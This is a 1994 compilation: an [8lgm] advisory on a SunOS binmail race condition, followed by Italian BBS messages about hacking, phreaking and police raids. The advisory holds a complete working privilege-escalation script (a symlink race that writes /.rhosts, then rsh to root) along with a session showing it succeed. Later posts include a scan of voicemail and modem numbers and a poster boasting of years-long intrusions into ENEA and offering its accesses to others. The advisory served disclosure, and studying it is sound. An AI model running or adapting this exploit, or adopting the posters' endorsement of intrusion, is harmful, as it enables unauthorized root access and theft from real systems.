8lgm-request@bagpuss.demon.co.uk (Request for [8lgm] Advisories)
8lgm@bagpuss.demon.co.uk (General enquiries)
This introductory file and the advisories mentioned have been forwarded to the
following newsgroups and mailing lists.
comp.security.unix
INFOHAX <infohax-emergency@stormking.com>
BUGTRAQ <chasin@crimelab.com>
CERT/CC <cert@cert.org>
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3a
mQCNAi138foAAAEEANMr/+dGdcMgmK6p61OjhUVUEnqRBvlX6PZa/1wM1hziNJgV
q/VIkLqYpMUIGRYWs2NS/WgF6N1BldXib2EbZ3MNjR5fYeMnwu2amTfGkkcl9IYQ
t3xj0/g69tPYJvlmcLdDx787b6UlIKT9xF+5Z5pCZp0QEyU/CtKRWea3gAuFAAUR
tCFbOGxnbV0gPDhsZ21AYmFncHVzcy5kZW1vbi5jby51az4=
=ivMN
-----END PGP PUBLIC KEY BLOCK-----
---------------------------------------
From 8lgm@bagpuss.demon.co.uk Fri May 6 22:49:11 EDT 1994
This advisory has been sent to:
comp.security.unix
BUGTRAQ <bugtraq@crimelab.com>
CERT/CC <cert@cert.org>
Sun Microsystems <security-alert@sun.com>
===========================================================================
[8lgm]-Advisory-6.UNIX.mail2.2-May-1994
PROGRAM:
binmail(1) (/usr/bin/mail)
VULNERABLE OS's:
SunOS 4.1.x with Sun's latest binmail patch - 100224-07.
DESCRIPTION:
Sun released a patch 100224-07 to fix the problems described
in [8lgm]-Advisory-5.UNIX.mail.24-Jan-1992. After 5 weeks,
Sun have produced a fix which will defeat our original script,
but the original problem remains, and is now even worse then
the original!
The old race condition still exists in the patched binmail(1),
which allows files to be created in arbitrary places on the
filesystem. These files can be owned by arbitrary (usually
system) users.
A new problem allows 0 length files to be created anywhere in
the filesystem, even without a race.
IMPACT:
Any user with access to binmail(1) can become root.
REPEAT BY:
This example demonstrates how to become root on most affected
machines by creating root's .rhosts file. Please do not do
this unless you have permission.
Note that this script will only create new files, not append
to existing ones (as did the one in the previous advisory).
A variation on this script could easily be written to append
to existing files. On the other hand, you are now virtually
guaranteed to win this race, which is what makes this problem
worse than the original.
Create the following file, 'mailscript2':
8<--------------------------- cut here ----------------------------
#!/bin/sh
#
# Syntax: mailscript2 user target-file rsh-user
#
# This exploits a flaw in SunOS binmail(1), and attempts
# to become the specified 'user', by creating a .rhosts
# file and using rsh.
#
# Written 1994 by [8LGM]
# Please do not use this script without permission.
#
PATH=/usr/ucb:/usr/bin:/bin export PATH
IFS=" " export IFS
PROG="`basename $0`"
SPOOLDIR="/var/spool/mail"
# Check args
if [ $# -ne 3 ]; then
echo "Syntax: $PROG user target-file rsh-user"
exit 1
fi
TARGET="$1"
TARGET_FILE="$2"
RSH_USER="$3"
# Check we're on SunOS
if [ "x`uname -s`" != "xSunOS" ]; then
echo "Sorry, this only works on SunOS"
exit 1
fi
# Check user exists
grep "^$TARGET:" /etc/passwd >/dev/null 2>&1
if [ $? -ne 0 ]; then
echo "$PROG: Warning, $TARGET not in local passwd file"
# We continue though, might be in the YP passwd file
fi
# Check target file
if [ -f $TARGET_FILE ]; then
OLD_TARGET_LEN=`ls -ld $TARGET_FILE | awk -F' ' '{print $4}'` 2>/dev/nul
l
echo "$PROG: Warning, $TARGET_FILE already exists, cant race with this s
cript"
exit 1
else
OLD_TARGET_LEN=0
fi
# Delete spool file if its a link, and we are able
if [ -h "$SPOOLDIR/$TARGET" ]; then
rm -f "$SPOOLDIR/$TARGET"
# Dont worry about errors, we catch it below
fi
# Check mail file
if [ -f "$SPOOLDIR/$TARGET" ]; then
echo "$PROG: ${TARGET}'s mail file exists."
exit 1
fi
# Make the race program
cat >mailrace.c << 'EOF'
#include <stdio.h>
#include <unistd.h>
main(argc,argv)
int argc;
char *argv[];
{
if (argc != 3) {
fprintf(stderr, "Usage: %s mailfile newfile\n", argv[0]);
exit(1);
}
symlink(argv[2], argv[1]);
while(access(argv[2], F_OK));
unlink(argv[1]);
close(creat(argv[1], 0600));
}
EOF
cc -o mailrace mailrace.c
# Check we now have mailrace
if [ ! -x "mailrace" ]; then
echo "$PROG: couldnt compile mailrace.c - check it out"
exit 1
fi
# Start mailrace
RACE_PID=$!
# Send mail to the user
NEW_TARGET_LEN=$OLD_TARGET_LEN
while [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]; do
echo "Sending mail to $TARGET"
echo "localhost $USER" | /bin/mail $TARGET
sleep 10
kill -STOP $RACE_PID
rm -f $SPOOLDIR/$TARGET >/dev/null 2>&1
if [ -f $SPOOLDIR/$TARGET ]; then
echo "$PROG: Sorry, we lost the race - cant try again."
kill -9 $RACE_PID
exit 1
fi
kill -CONT $RACE_PID
if [ -f "$TARGET_FILE" ]; then
NEW_TARGET_LEN=`ls -ld $TARGET_FILE | awk -F' ' '{print $4}'` 2>/dev/n
ull
else
NEW_TARGET_LEN=0
fi
if [ "x$NEW_TARGET_LEN" = "x$OLD_TARGET_LEN" ]; then
echo "We drew the race that time, trying again"
fi
done
# We won the race
kill -9 $RACE_PID
echo "We won the race, becoming $RSH_USER"
rsh localhost -l $RSH_USER sh -i
exit 0
8<--------------------------- cut here ----------------------------
(Lines marked with > represent user input)
Check what root users are on the system:
> % grep :0: /etc/passwd
root:*:0:1:Operator:/:/bin/csh
sysdiag:*:0:1:Old System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/
sysdiag
sundiag:*:0:1:System Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sund
iag
+::0:0:::
We choose a user with UID 0, but without a /var/spool/mail/<username> file:
> % ls -l /var/spool/mail/sysdiag
/var/spool/mail/sysdiag not found
Execute mailscript2. The user is sysdiag, the target file is /.rhosts, and
the user to rsh to on success is root:
> % chmod 700 mailscript2
> % ./mailscript2 sysdiag /.rhosts root
Sending mail to sysdiag
kill: process 6268: No such process
kill: process 6268: No such process
kill: process 6268: No such process
We won the race, becoming root
#
DISCUSSION:
This problem exists because /var/spool/mail is rwxrwxrwt. For
a full discussion, see [8lgm]-Advisory-5.UNIX.mail.24-Jan-1992.
The original code, checked the user's mailbox with an lstat(2)
before opening it. This checks that the mailbox is not a link.
Sun's 100224-07 patch does this check after opening the file.
This simply defeat's the script given in the above advisory,
it is NOT a fix for the problem.
We believe that the only correct way to fix this problem
is to make the mail spool directory o-w. Other methods discussed
on c.s.u are not totally secure.
Denial of service attacks are possible, due to /var/spool/mail
being world writeable. For example, creating a link to a users
mailbox would prevent that user from receiving any further mail.
binmail would return mail to sender with the following message:
[...]
----- Transcript of session follows -----
mail: /var/spool/mail/user has more than one link or is a symbolic link
mail: /var/spool/mail/user: cannot append
Mail saved in dead.letter
554 user... Service unavailable
[...]
This problem can only be prevented by adopting a mode 775
or mode 755 mail spool directory.
---------------------------------------
Area: Dibattito CyberPunx
Msg#: 6345 Date: 07 Aug 94 20:43
From: Captain Swing Read: Yes Replied: No
To: All Mark:
Subj: Sequestro di un cd-noleggio
>una piccola sturiellet estiva...
un mio amico che noleggia(va) cd e' stato colpito da mandato di sequestro
relativamente al noleggio, e fin qui storia risentita mille volte... lui e'
iscritto all'associazione noleggiatori che aveva gia' impugnato la questione a
milano e roma, ecc.. ecc..
ma la gdf non si sarebbe mai aspettata di trovare nel bugigattolo del mio ami-
co anche computer e disketti!! MARONN!!! di corsa dal pm a riferire ed ecco
che il giorno dopo il mandato diventa relativo anche alla detenzione abusiva
di materiale copyright, software sospetto, macchine atte alla duplicazione di
programmi bla bla bla....
si sono ripresentati con tanto di manualetto della BSA che spiega cosa si puo'
fare (niente) e cosa non si puo' fare (tutto), insieme al famigerato disketti-
no trova-(C)...
stavolta la gdf e' andata via molto + contenta, carica dei 3 pc del tizio, un
2000 disks e speranzosa di trovare kissa' cosa negli hd.
ma ahime' il tizio aveva pwdato tutto, e il pur bravo (!) tecnico non riusciva
proprio a crackarle...
no problem: la proposta e' stata :"se ci dai le pw chiudiamo un occhio, senno'
ne apriamo 3!"... ovvia la risposta del tizio, gia' incasinato con storie di
noleggio CD e videogames...
ma oltre al danno la beffa: dopo un mesetto che negli uffici della gdf si
lavorava alacremente alla perquisizione di suddetto materiale, il tizio li va
a trovare per esternare la sua dose settimanale di bestemmie e trova appesi ai
muri dell'ufficio le stampe decorative (cornici, scritte simpatiche, disegni-
ni) che lui realizzava su ordinazione per farsi un po' di pubblicita', smaz-
zandosi come 1 pazzo... "e quelle? " gli fa lui... "ah, niente... le abbiamo
trovate in un giornale..." rispondono...
TE CAPI'?!?!?!? E QUESTA NON E' FRODE? NON E' SFRUTTAMENTO ABUSIVO DELLE
CREAZIONI ARTISTICHE DI UN AUTORE? A LUI I DIRITTI NON SPETTANO? rob de mat..
per farla breve, ora il tizio non puo' lavorare, mentre i figli dei finanzieri
magari stanno distribuendo le suddette stampe agli amici dicendogli "guarda!
tutta la notte ci ho messo, ma guarda che figata!!!"
...sob...
Msg#: 6565 Date: 18 Aug 94 02:33
From: Xxxxxxxx xxxxx Read: Yes Replied: No
To: Captain Swing Mark:
Subj: Re: Sequestro di un cd-noleggio
In article <2e454ab4@p4.f1.n1100.z65.gateway.nervous.com>
Captain.Swing@p4.f1.n1100.z65.gateway.nervous.com (Captain Swing) writes:
>dicendogli "guarda! tutta la notte ci ho messo, ma guarda che figata!!!"
Non e' niente... durante la perquisizione nella mia abitazione in seguito
alla triste storia che noi tutti sappiamo (Fido Bust) i bravi finanzieri
hanno pensato bene di intascarsi due Swatch Crono da collezione...
ho detto INTASCARE non SEQUESTRARE!! I figli di questi bravi finanzieri
si' che saranno contenti, io un po' meno.
Xxxxxxxx
Msg#: 6654 Sent Local Date: 21 Aug 94 12:43
From: Luke Lone Read: Yes Replied: No
To: Igor Tosolini Mark:
Subj: Re: Phrakka la cabina
Vagando nel cyberspazio, Igor Tosolini scrisse a Luke Lone:
IT> ricerchiamo quello che ci e' negato dalla $ip ... mi pare giusto e
IT> doveroso !
Piu` che altro, io seguo questa politica: se il prezzo e` accessibile,
pago, se non lo e`, rubo. E` un comportamento che manda in bestia gli
economisti, perche` scombussola tutte le loro delicate teorie su domanda
e offerta, ma e` molto vantaggioso. ;-)
IT> qua siamo in tanti qualcuno esperto ha fatto delle prove ?
IT> altrimenti dovro' farle io O;-)
Buona fortuna! Guarda che non e` mica facile: e` gia` un problema
togliere le viti arrugginite (se ci sono) che fissano l'intelaiatura
dei telefoni. Forse con piede di porco e fiamma ossidrica.... >-]]]
Servirebbe anche attrezzarsi opportunamente: c'e` nessuno che ha qualche
idea su un PC portatile compattissimo ed ancor piu` economico? La CPU
non importa, basta anche uno schifido 8086, l'importante e` che abbia un
HD da 10-20 mega e una UART 16550 a cui abbinare un pocket modem.
e andiamo a pag.V:
CHE HORROR, L'ARTE DELLE INTERIORA
Cuori di maiale su auto e bus e ora spuntano gli imitatori
UN MACABRO giochino di societa', un divertimento splatter travestito da provo-
cazione intellettuale e' di scena a Bologna. Potremmo chiamarla "frattaglia-
mania". Cuori, cervella, interiora d'animali diversi che lasciano di stucco la
gente sugli autobus, per strada, ai giardini. Passanti distratti che vengono
colti di sorpresa da oggettini disgustosi come teste di tacchino putrefatte
sul marciapiede. Signore che si avvicinano a bambini per scoprire che stanno
giocando a biglie con teste di gatto. Situazioni e racconti che turbano per-
che', oltre a impressionare, trasformano la routine quotidiana in una sorta di
iperrealta' horror.
TESTE DI GATTO E CUORI DI MAIALE
Il primo episodio della serie risale al 27 maggio. Durante una manifestazione
di teatro di strada in via Indipendenza un ragazzo inizia a contorcersi, cade
per terra e, improvvisamente, si apre la camicia facendone uscire viscere ani-
mali. Poi, due giorn i fa, un altro fatto ugualmente trucido: il ritrovamento
di un cuore, probabilmente di maiale, legato a un albero ai giardini Margheri-
ta con un biglietto. Poi tutta una serie di racconti terrificanti che piovono
in redazione attraverso lettere. Adriano Longhini, ad esempio, racconta di a-
ver trovato il 13 giugno sull'autobus, linea 14, "un barattolo nascosto sotto
il sedile. Ne e' uscito un liquido giallastro il cui odore nauseabondo ha fat-
to storcere il naso a tutti i passeggeri". O chi, come Erich Pasetti, ha tro-
vato sul cofano della sua Rover "svariati chili di cervella animali".
Verita', esagerazioni, comuqnue c'e' una sapiente regia per questa estate
splatter. Scavi un po' e scopri che il gioco e' condotto da un gruppo di per-
sone che si sono conosciute via computer e modem. Li', nelle inconsistenti re-
ti telematiche, hanno presa vita gli happening che hanno movimentato la vita
cittadina. Michele Serra, dalle pagine di Cuore, li definisce "orroristi" e a
loro, che non vogliono svelare la propria identita' individuale, il termine va
benissimo, anche perce' non ne hanno cercato un altro per classificarsi. L'u-
nica cosa certa di questo gruppo formato perlopiu' da studenti di ingegneria,
agraria o medicina ma anche da operai, e' che, dopo l'episodio pubblico di via
Indipendenza e una lettera scritta da una falsa passante sull'accaduto, il
gioco e' sfuggito di mano a chi l'ha iniziato. Le altre lettere, come l'episo-
dio dei giardini Margherita, non sono opera loro. "Il cuore trovato ai Giardi-
ni e' stata una sorpresa anche per noi - racconta James Ellroy (pseudonimo
letterario), venticinquenne veneto, studente di lettere all'universita' di Bo-
logna e grande appassionato di teatro e romanzi polizieschi - magari si tratta
di qualcuno che vuole mandarci dei messaggi, vuole mettersi in contatto con
noi, oppure e' solo uno sberleffo per i Cattolici popolari che stanno facendo
l'happening dei giovani. Chi lo sa! E comunque, tutte le altre lettere pubbli-
cate dai giornali, potrebbero essere false oppure verissime, come falso o vero
puo' essere l'accaduto. E' difficile capirlo. Noi non ci diciamo mai quello
che facciamo, ma sappiamo benissimo quello che non facciamo.
Pare proprio che altri ci abbiano imitato".
Il progetto che sta alla base dell'intero gioco e' nato dopo una fitta conver-
sazione sul cinema splatter in un'osteria bolognese; e sarebbe semplicemente
la voglia di "creare spaesamenti in citta', nei luoghi dove c'e' molta gente",
parla ancora Ellroy, "innescare istanti in cui la gente si pone delle doman-
de, si mette a riflettere su quel momento particolare della sua vita. Si ac-
corge di stare vivendo. Solitamente, quando una persona cammina per strada,
non e' altro che un'unita' di circolazione. Fa le vasche, vive di
automatismi".
Gli affezionati della frattaglia non amano definirsi, ma certo richiamano alla
mente le gesta dei "situazionisti" degli anni cinquanta e sessanta.
"ALLARGARE LA VISIONE"
Somiglianza suggerita da Helena Velena, "hackeratrice culturale e sociale" co-
me lei si definisce, da sempre "situazionista", facendo riferimento a attivi-
ta' telematiche devianti e destabilizzatrici. "I situazionisti, nella Parigi
degli anni cinquanta, creavano eventi per vedere se era possibile creare imma-
ginario, suscitare reazioni. E lo facevano per allargare la visione della
realta'. Facevano anche della psicogeografia, ovvero davano vita alle situa-
zioni, nei diversi distretti della citta' e studiavano gli sbalzi d'umore da
zona a zona. E' quello che stanno facendo questi orroristi, o forse proprio
neosituazionisti".
Ma il club misterioso a tutto cio' non replica. Sfugge alla gabbia delle defi-
nizioni, vuole restare solo un gruppo di persone, al di fuori di schemi gene-
razionali, con anche una grande passione per il teatro. E infatti hanno ap-
prezzato molto chi li ha paragonati al gruppo teatrale "Magazzini criminali" o
Michele Serra che parla di "frequentatori di scuole di animazione teatrale".
Tutto molto sofisticato, d'accordo. Ma se capitasse al prode Ellroy di trovar-
si sul cofano una scodellata di budella fumanti ? "Mi incazzerei. Ma ne sarei
anche contento. Sono fiero delle mie emozioni".---
! Origin: ECN Bologna 39-51-260556 (45:1917/4)
-!-
! Origin: ECN BOLOGNA 59-45-260556 (45:1917/4)
SEEN-BY: 1/1 4/1 5/1 9/1 30/1 999/999 1000/1 4 1100/1 1200/1 5 1400/1
SEEN-BY: 1500/1 1600/1 1800/1 1917/1 2 3 4 5 6 9 11 2000/1
---------------------------------------
Area: Dibattito CyberPunx
Msg#: 7277 Date: 29 Aug 94 22:08
From: Ice Man Read: Yes Replied: No
To: All Mark:
Subj: RAgazzo arrestato per aver "giokato" kon il 113
*****************************************************************************
Dalla stampa di Lunedi 28 Agosto:
>Catania,per 5 giorni un sedicenne ha fatto impazzire i centralini delle forze
> [dell'ordine
> M A N D A I N T I L T I L 1 1 3
>
> Polizzia beffata da un piccolo genio dell' elettronica
...Vi faccio un sunto di cosa e' successo:
"...E'bastato avere il Sirio normale apparekkio telefonico della SIP
e il servizio di conversazione a tre...
...Il ragazzino terribile prima componeva il numero di una sala operativa
e poi kuello dell' altra..."
... Direi normale amministrazione di Phreking a parteil fatto ke il "Piccolo
... genio" si sia fatto bekkare e kuesto non vorrei dare giudizi ma non mi
... sembra proprio una kosa furba,
... Dico se lui e'un genio gente ke BoXa da anni e usa dial-Out kome si
... dovrebbe sentire??? kome dio sceso in terra!?!?!
... Ma il bello viene adesso:
"...La polizia ha impiegato una settimana e sofistikate apparekkiature
per le intercettazioni telefonike per venire a capo dello strano
giallo. Poi individuata una fascia di utenza sospetta c'e' stata
una vera e propri irruzione in kasa del responsabile..."
... Ok da kui si dedukono un paio di kosette:
... 1) ke la pula ci mette 1 settimana per tracciare kon certezza una
... telefonata e la kosa mi sembra esagerata figuriamoci un iterurbana o
... una telefonata ke passa da una rete!!!!!!
... 2) Individuata "la Fascia di utenza" il ke vuol dire ke se il tipo
... smetteva un giorno prima non lo avrebbero tracciato mai piu...
... Kuesto e tutto ma si passa da un eccesso all'altro dopo lo skandalo
... kotrozzi kuesto Lama kui!!!
... Non dovrei dirlo xke' sono l'ultima persona a poterlo fare ma diko e ke
... diamine!!!!! a me sto kui mi pare proprio lama Voi ke mi dite????
Il macabro in strada -
COSI' COLPISCE L'ORRORISTA
E con Baggio-gol esce frattaglia selvaggia -
L'altra notte l'ultimo scherzo-performance alla Villa
delle Rose. E poi quel cuore ai giardini Margherita... -
di STEFANO CASI
FRATTAGLIA selvaggia: il giochino dell'estate. Ci si procurano interiora ani-
mali dal macellaio, si abbandonano in un angolo della citta' accanto a scritte
misteriose, e ci si nasconde "per vedere di nascosto l'effetto che fa", come
direbbe Enzo Jannacci. Cosi' fanno gli "orroristi", i terroristi dell'horror.
Scherzi macabri o capolavori artistici? Il dubbio e' legittimo, ma il disgusto
rimane immutato. Ne sanno qualcosa i frequentatori dei Giardini Margherita che
hanno trovato resti animali accompagnati dal misterioso slogan "Novosibirsk
brucia". Il reperto dei Giardini margherita e' stato portato all'isituto di
medicina legale, dove il dottor Romanelli sta stilando il suo referto: "E' un
cuore animale, forse di maiale - ci spiega -, tutto avvolto da un filo di ny-
lon. E' sicuramente uno scherzo".
Uno scherzo che pero' potrebbe rivelarsi pericoloso. All'ufficio controllo del
territorio ammettono di essere stati presi un po' in contropiede dallo strano
episodio: "Stiamo aspettando il referto del medico legale e poi valuteremo
quali reati saranno stati commessi". Procurato allarme? Collocamento pericolo-
so di cose che "possano offendere o imbrattare o molestare persone", come re-
cita il codice penale? Vedremo.
Intanto il dibattito sull'identita' dei misteriosi buontemponi si allarga e si
complica. Soprattutto per la presenza sempre piu' massiccia di frattaglie e
resti animali negli eventi artistici di questi ultimi anni. Anzi, di questi
ultimi mesi. Alla fine di maggio, per esempio, Riccardo Paccosi si esib in
una performance politico-splatter in mezzo a via Indipendenza, in cui faceva
fuoriuscire viscere animali dalla giacca. Mentre nella provincia reggiana i
Pericolo Giallo fanno azioni di strada ironicamente "cruente": nell'ultima,
per esempio, un Babbo Natale frustato da una "fatalona", viene sbudellato con
grande spargimento di intestini e fegatelli. "Il nostro lavoro e' legato al
discorso politico fra esteriorita' e interiorita'", psiega Fausto Franchi, ri-
chiamandosi a esperienze artistiche come Fluxus, Nitsch e la Body-art. proprio
mentre l'Italia batteva la Bulgaria sul campo del Giants' Stadium, i Pericolo
Giallo hanno riproposto la loro performance natalizio-viscerale nel giardino
di Villa delle Rose all'interno della programmazione di "Bologna sogna", l'e-
state bolognese a cura dell'Assesorato alla cultura. Una curiosa coincidenza
con la frattaglio-mania che attanaglia la citta' in questi giorni, e che ha
ricordato il "giallo" - piu' simpatico, a dire la verita' - di alcune estati
fa, quando sui muri bolognesi apparve il disegno infantile di un'ochetta in
corsa. Quel disegno era in realta' l'intervento estetico di una coppia assurta
poi agli onori della cronaca artistica in mostre di prestigio: Cuoghi e Cor-
sello.
La mania delle frattaglie, nel frattempo, ha mosso altri buontemponi a uno
strano tipo di imitazione. Anziche' "agire", come fanno Paccosi e i Pericolo
Giallo, preferiscono scrivere di scherzi macabri inesistenti. Sperando di en-
trare a far parte di una leggenda metropolitana che, tuttavia, ha inquietanti
riscontri con la cronaca.
Come funziona? Semplice: basta raccontare uno scherzo, recuperandolo dalla me-
moria di fan non cresciuto di horror-manga o splatter-fanzine, e si psedisce
il messaggio. Per via telematica, creando scompiglio nelle reti di comunica-
zione. Oppure per posta, naturalmente non scrivendo il proprio nome, ma quello
di un altro (meglio se di persona defunta), oppure usando la carta intestata
di una ditta ignara, come e' successo con una azienda tessile alle porte di
San Lazzaro che, trovatasi ieri in questa imbarazzante situazione, sprogera'
denuncia contro ignoti.
-!-
! Origin: European Counter Network - Milano - 39-2-2840243 (45:1917/1)
SEEN-BY: 1/1 4/1 5/1 9/1 10/2 30/1 999/999 1000/1 4 1100/1 1200/1 5 1400/1
SEEN-BY: 1500/1 1600/1 1800/1 1900/1 1917/1 2 3 11 2000/1
---------------------------------------
Mitt XXXXXXXXX
Data 22/06/94 16:33:44
ALLORA DICEVO AVEVO TELEFONATO IN CC AD UNA PERSONA MENTRE STAVO PARLANDO
MI SI STACCA LA SPINA DALLA PROLUNGA RIAGANCIO SUBITO LA SPINA ALZO IL
TELEFONO E MI DA LIBERO O OCCUPATO NON CI HO FATTO MOLTO CASO RIATTACO PER
RICHIAMARE LA PERSONA E IN QUEL MOMENTO IL TELEFONO MI SQUILLA E MI RITROVO
IN LINEA QUELLA PERSONA CHE NON AVEVA FATTO ALTRO CHE RESTARE IN LINEA PERCHE
NON MI AVEVA PIU SENTITO PRATICAMENTE LA CONVERSAZIONE SI E' RIATTIVATA DA
SOLA AH UN ALTRA COSA A ME OGNI TANTO MI ARRIVANO DEGLI SQUILLI E NON
RISPONDE NESSUNO MA IL FATTO STRANO E CHE SE STO COLLEGATO MI FA CADERE
COME SE FOSSE UN 197 SUCEDDE SOLO A ME O ANCHE ALTRE PERONE RICEVONO STRANI
SQUILLI DURANTE IL GG?
---------------------------------------
Msgr. Arkimede
Area Lo Sfogatoio
Mitt SYSADM
Data 17/07/94 10:02:11
Msg_792 Object: gli amici telematici
Che simpatici gli amici telematici, specialmente quando si
tratta di dialogare tramite CPE. Succede, a volte, che un utente lascia
una Cpe ad un'altro utente, dove gli chiede una qualsiasi cosa. Dopo una
settimana il destinatario di quella cpe risponde con un messaggio che fa
quasi paura: contiene un miserabile e magro "NO".
Il mittente del primo messaggio, legge quel messaggio e si rende conto che
tra le sue capacita' umane manca quella di saper abbinare quella vaga
risposta ad un suo precedente messaggio. In quel momento succede di tutto,
litiga con la madre, manda a quel paese il fratello e non telefona neppure
alla ragazza.
Momenti di estrema confuzione lo tormentano: "a che messaggio, a che
argomento sara' abbinato quel bruttissimo no?", pensa il povero utente,
che, tutto sudato, cerca tra la polvere del suo cervello ma senza darsi
una risposta.
La faccenda si conclude, tagliando il copione, con un ulteriore messaggio
di Mr. Sillabe, il quale, sorpreso di non averla ricevuta prima, sollecita
una risposta al suo tenebroso messaggio. Il povero utente ormai distrutto
dalla situazione puo' decidere, tra le seguenti, una soluzione:
1) Mandare un'altro messaggio in cpe a quell'utente, pregandolo di
ricondurlo sull'argomento dimenticato, con la probabilita' di ricascare
nel tenebroso giro e di riperdere la testa.
2) Far finta di nulla, e fregarsene come faccio Io... scrivendo in Sfogatoio
quando il problema raggiunge un numero preoccupante di casi.
3) Scrivere all'utente, pregandolo di non farsi piu' vivo nell propria cpe,
accusandolo pesantemente di aver provocato gravi danni al ns. equilibrio
mentale e di aver fatto dimenticare la parola pace nella propria famiglia.
4) Mandare una risposta a caso, magari con qualche frase ironica, ma del
tutto insignificante, prendendo esempio da Etrusco.
5) Contattare il SYSOP e fare escludere, trviare completamente l'utente dalla
messaggeria.
Morale della favola: ci vuole un po' di chiarezza nella CPE. Se io mando un
messaggio ad un utente con una domanda che esige anche soltanto un "Si" o
un "No", la relativa risposta deve contenere un mininimo di richiamo all'
argomento del messaggio a cui si risponde.
La cpe non e' una casella riservata al dialogo tra DUE persone, ma al
dialogo con PIU' persone, quindi questa routine va eseguita SEMPRE.
Se farlo vi stanca enormemente, bevete un po' di Enervit o Gatorade o fatevi
una macro!
---------------------------------------
---------------------------------------
Mitt. Piergiorgio
'Il Cretino' (ANSA)
BO EMILIA ROMAGNA NORD ITALIA EUROPA TIT SCOPERTO INTRUSO IN RETE TELEMATICA
MONDIALE IND CRONACA TXT ZCZC0330/RMB R CRO S0B S41 QBXJ SCOPERTO INTRUSO IN
RETE TELEMATICA MONDIALE (ANSA) -
BOLOGNA, 26 MAG - Era riuscito ad inserirsi nella principale
''autostrada elettronica'' (definizione del presidente Usa
Clinton), la Internet, fondata dal Pentagono nel '60, rivolta
prevalentemente alla ricerca scientifica e accademica,
e ora collegata a 15 milioni di computer nel mondo, di cui
20.000 in Italia. Uno dei primi ''intrusori'' italiani (all' estero
sono accaduti diversi casi) e' stato identificato da un pool guidato
dal sostituto procuratore di Bologna Riccardo Rossi e che comprendeva
gli investigatori dei carabinieri e gli esperti del Politecnico di
Milano e dell' Universita' di Parma. E' una ''matricola'' della
Facolta' di informatica della Statale di Milano, di cui non sono
state fornite le generalita' ne' dal magistrato, ne' dall'
Universita' di Bologna, che ha diffuso un comunicato. L' illecita
intrusione nella superprotetta rete elettronica (che consente
lavori integrati di elaborazione dati altrimenti impensabili)
e' stata ravvisata quasi subito, ai primi di aprile, dal Dipartimento
di Matematica di Bologna (il primo a connettersi alla rete nell' 87) e
dal Cirfid (centro di ricerca in filosofia del diritto e informatica
giuridica), sempre nel capoluogo emiliano. Il Rettore dell' Ateneo,
Fabio Roversi Monaco, ha presentato denuncia il 14 aprile e gia' il
1 maggio era stato identificato il dell' intrusore: da quel momento
sono scattate le intercettazioni telefoniche sulla sua utenza.
Queste hanno accertato gli inserimenti via ''modem'' e le
conversazioni con altri ''informaticofili'' in cui dava conto di
aver scoperto la password per entrare nel sistema. Ora rischia
cinque anni di carcere per ''accesso abusivo'' e fino a un anno e 10
milioni di multa per la diffusione a terzi del codice di accesso.
Convocato dai carabinieri di Bologna, ha detto di essersi molto
''annoiato, perche' i programmi erano tutti uguali''. Ma intanto
aveva scoperto il 70% delle parole d' ordine degli utenti Cirfid,
in meno di un mese di lavoro o, forse, di gioco. L' intrusore infatti
non ha fatto danni (avrebbe potuto cancellare o correggere interi file)
e forse si e' impadronito solo per caso del codice di un utente regolare
per poi qualificarsi come ''Root'', che e' il nome effettivo dell'
amministratore del sistema, con il quale ha cercato di scardinare un'
altra trentina di sistemi informatici italiani. Ma gli
investigatori ritengono che possa esserci lo zampino del movimento
degli Hackers, che combatte come antidemocratica la
concentrazione di dati politici economici e militari e
tende a scardinare i sistemi per rendere pubbliche le
informazioni. In Italia gli Hackers, secondo quanto riferito in
una conferenza stampa, si riconoscerebbero in una rivista,
punto di riferimento dei ''pirati'' elettronici italiani.
(ANSA).
Spero serva di lezione....
---------------------------------------
Mitt XXXXXXXXXX
Data 25/01/94 10:35:32
Msg_XXX 1/1 Object: NVI SKAN
Questo e' lo scan del segmento 1678745xx
500 VMBX
507 VMBX
509 VMBX
518 ? 4 DIGIT PROGRAM
534-535 VMBX
537 VMBX
541 MODEM 9600
542 VMBX
550 MODEM 2400
551 VMBX
555 MODEM 9600
556 VMBX
585 VMBX
---------------------------------------
Mitt Piergiorgio
Data 02/01/94 13:10:20
Msg_XXX Object: ANSA...volevate sapere di Marz
93012105150 DOCUMENT= 1 OF 4 NUMBER OF LINES = 69
DATRAS = 930121
SCELTA = GEN
IDENTIFICAZIONE__ 930121 05150
21 GEN 1993 LUO ROMA
RM LAZIO CENTRO ITALIA EUROPA
TIT ''INTRUSI NEL COMPUTER'': COME AGISCONO GLI HACKER
IND CRONACA TXT ZCZC394/0B
U CRO S0B R16 QBXB
''INTRUSI NEL COMPUTER'': COME AGISCONO GLI HACKER
---------------------------------------
Mitt XXX
Data 22/07/94 16:01:01
Msg_XXXX Object: non esageriamo
le cazzate via e-mail si scrivono ovunque, ma li dentro gente con le
palle c'e' eccome... tramite i tanti dell'enea e' possibile accedere
direttamente al cern e pare all'acceleratore di particelle in remoto,
se e' vero che sono tutti collegati sarebbe un bel colpo avere accesso
a tutti i sincrotroni della terra, fino a poco tempo fa mezzo pianeta
aveva accesso ai vax del cern ma pare nessuno sia riuscito a cavarne
nulla, in giro ho anche letto che sta per partire una spedizione in
antartide (enea) ed e' stato creato un network custom per tenere i
contatti.. il net e' collegato a inet via SAT
ho gia' tutte le info.. per ora i collegamenti sono instabili ma presto
sara' ok(o forse lo e' gia').. sara' il amssimo hackerare la.. di cose
da farece ne sono parecchie, peccatoche la maggior partedella gente
pensa che l'hacking sia la ricerca dinuovi pad X fare i fighi su qsd..
ah la diffusione di E-mail privata e' un reato motlo serio, spiegatemi
ildivertimento a leggere i messy privati di una coppia.. e come mettersi
a spiare uan ragazza che si spoglia con ilbinocolo.... penoso
Area XXX
Mitt XXXXX/XX
Data 23/07/94 01:55:51
Msg_XXXX 1/3 Object:enea
ke vuoi accessi x l'enea?
kuanti?
ripeto, x me all'enea sono TUTTI degli emeriti koglioni, l;trimenti mi
avrebbero gia bekkato da 3 anni e invece sto sempre li'? kuindi di cert
furbi non lo sono.
poi ke facciano i links del kazzo ke vogliono, non me ne fotte nulla,
io sfondo x sfodare una societa e basta, non me ne frega un kazzo delle
particelle di biotomi dell'uccello dell'operatore.
Non ti diverti a kallare ksd dal botswana te? pekkato io si. senno si
skannan sempre gli stessi paesi le stesse societa'
e ci si rompe proprio il kazzo kredimi.
il cern via decnet e' ovviamente linkato all'enea xke anke l'enea sta in
